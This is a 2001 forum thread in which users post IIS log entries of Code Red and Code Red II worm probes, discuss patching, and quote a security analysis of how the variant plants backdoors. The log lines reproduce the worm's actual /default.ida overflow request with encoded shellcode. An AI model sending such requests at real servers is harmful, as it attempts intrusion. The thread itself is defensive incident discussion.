Code Red is still going strong.. Look at my log file!!

[Atreyu 0]

Here's my IIS(web) log file from August 4. Every hit with 'NNN..' AND 'XXXX..' IS Code Red. Notice it has changed from NNN to XXX.. meaning that it's mutating. I'm not in danger since I installed the patch weeks ago... but if every IIS server out there is getting scanned at least this many times per day.. and the worm is changing... we could be in for some interesting times!!

 

 

 

Sample:

 

2001-08-04 06:49:08 211.157.208.98 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 07:12:30 207.202.243.99 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 07:27:45 61.218.78.237 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 08:09:49 63.125.234.2 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 08:51:02 195.42.160.103 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 09:05:04 166.104.232.76 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 09:05:23 210.242.6.5 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 09:21:36 208.148.169.153 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 12:44:09 193.252.59.234 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 13:45:47 195.76.139.14 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 16:25:38 148.243.150.66 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 16:44:10 4.60.60.87 - 192.168.0.4 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 16:44:44 4.60.60.87 - 192.168.0.4 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 16:44:44 4.60.60.87 - 192.168.0.4 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 17:22:45 4.60.18.180 - 192.168.0.4 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 17:24:46 4.60.177.60 - 192.168.0.4 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

2001-08-04 17:43:20 203.74.30.193 - 192.168.0.4 80 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

 

 

Click here to download the entire log file and see for yourself. Or heck, just open up your own and take a look.

[clutch 1]

Could be worse.

[EddiE314 0]

yea true, glad i'm running XP 2526 RC2

[clutch 1]

Either way, that doesn't stop you from getting probed. It's just annoying as hell to me.

[Atreyu 0]

As clutch pointed out to me earlier too.. each hit came from a different server. So you can see the extent in which this worm has spread. It is really annoying to know that there is all this crap data out there on the net doing nothing but clogging it up and harming all these web servers.

 

Still, you have to marvel at it, and think to yourself how war in the future will be waged. I have a feeling it's gonna be country vs. country... trying to design worms and viruses intended to shut down the other's economy. Eh, whatever happens... the fact that one or two or three people can write a program like Code Red, and have it create havoc throughout the world... really is a frightening thought.

[EddiE314 0]

yea, tell me about it, i just thought about what you said, it is scary.

[whoisurdaddy 0]

Oh, that's what Code Red is. I had a bunch of NNNNNNNNNNNNNNN.. in my log file too. I already applied the patch 2 weeks ago. So applying the patch will kill Code Red or what?

[Atreyu 0]

Well, it doesn't really "kill" it, it just prevents it from infecting YOUR system. All those hits you've been getting though are coming from systems that have been invected.

[clutch 1]

I saw the link to this on www.voodooextreme.com.

 

http://grc.com/x/talk.exe?cmd=article&group=grc.security&item=21298&utag=

 

This describes the "X" variant a bit more. I REALLY hope everybody here is patched (and if not, patch and reboot damnit!)

 

[Atreyu 0]

Here's another link about the mutation... it's apparently worse than the first one. This mutation cannot be "tracked".

[Brian Frank 0]

8) Yikes!!! 8)

Note to self: Patch rest of house pc's.

And dad's laptop...

[JoakimE 0]

Yikes, that X version i becoming veeery popular, the logs are full of attacks 8)

[Atreyu 0]

Well just got out of bed and took a look at my logs... looks like I was scanned nearly every 3 minutes last night.

[clutch 1]

I got this over the weekend at work:

 

I am posting a message about a new variant of the Code Red virus that

has started circulating.

This one is much worse and if you are infected, probably ought to

reformat.

 

This morning, AFAIK, a new Code Red variant was released.

 

------------------------------------------------------------------------

--

Ok, here's the latest on this new variant.

 

1. It makes a copy of CMD.EXE called ROOT.EXE in the;

 

\inetpub\scripts

 

and

 

\program files\common files\system\msadc

 

directories. Does this on both drive C: and D: (doesn't fail if D:

doesn't exist).

 

2. It then runs its attack program code to infect itself upon

numerous other boxes. This is done randomly, although there is a bias

to attack boxes that are part of the same class A as infected

attacker (so it hits your own boxes sooner rather than later). Attack

code runs for 24 hours, 48 hours on Chinese language systems.

 

3. After attack code runs (and it seems to be based on clock ticks,

not date), it then writes out a Trojan.

 

File Explorer.exe (8192bytes or 7K as displayed by Windows) is

dropped (from the code in the original attacking URL) to the root of

drive C: and D: (again, doesn't matter if D: doesn't exist).

 

4. The system is then rebooted (probably a forced reboot).

 

5. When the system restarts, it loads the trojan Explorer.exe from

the root directory on the boot drive. This code then does several

things;

 

a) Launches the real Explorer.exe, so the system looks normal.

 

Sets SFCDisable in hklm\software\microsoft\windows

nt\currentversion\winlogon to some undocumented value. Presumably

this disables Windows File Protection (so critical files could be

overwritten)

 

c) Creates two virtual directories (via the registry) in

hklm\system\currentcontrolset\services\w3svc\parameters\virtual

roots. Called "C" and "D", they are mapped to the root directories of

the two drives and permissions are established in the virtual

directory to allow script, read, and write access as well as setting

execute permissions to scripts and executables.

 

d) goes into an endless sleep loop.

 

The end result of all of this action is to leave your box wide open

to remote connection and total compromise.

 

Unlike "Code Red", this worm doesn't attack any single target at any

point, although its attack strength seems to be much higher (it

launches 300 threads right off, although some may only launch 100),

so its propagation seems much higher.

 

The attack only works properly on Windows 2000 systems (preliminary

analysis). ICSA Labs tested against an NT 4.0/IIS 4.0/SP3 box and

received a standard error message. Reports from subscribers suggest

that XP IIS 5.1 RC1 is invulnerable also. Its expected that it works

on PWS and OWS equally to IIS (all on W2K).

 

Its obviously a short-lived attack, at least the process of

collecting victims. What would be done with them once collected is

another story. No attempt is made by the worm to send anything

"home", although detecting compromised boxes is far too easy (very

unfortunately) for anyone outside your network.

 

Cleaning a compromised box should really be done by reformatting.

Although logging is left on for the new virtual directories created

(meaning you'd see access in your IIS logs), there's really no way to

be sure that files haven't been implanted to leave other backdoors

(not as part of this worm, but as part of the use of the opening it

creates).

 

Credits:

 

The bulk of the analysis was done by Nick Fitzgerald of Virus-L (and

friends) and Roger Thompson of TruSecure. Additional help came from

Bruce Hughes of the ICSA Labs.

 

Cheers,

Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

 

---------------------------------

Now Registering for IIS FastTrack

http:/www.iistraining.com

 

Brett Hill - IISAnswers.com

brett@iisanswers.com (303) 543-7502

MCSE MCT A+ Net+ CIW-TT

[Busby 0]

If IIS isn't installed are you still at risk? Cause I have Win2k Pro and Win2k Server on 2 machines, one is the server (Win2k Server) and only one that has direct access to net but IIS is not installed. Also does this affect Apache server?

[Atreyu 0]

According to EVERYTHING I have read... no, this does not apply to Apache server, only to Microsoft's IIS.

 

As far as your other question... as long as you're not running IIS you should be ok. This bug only attacks computers with an unpatched IIS 4.0 or 5.0. Later.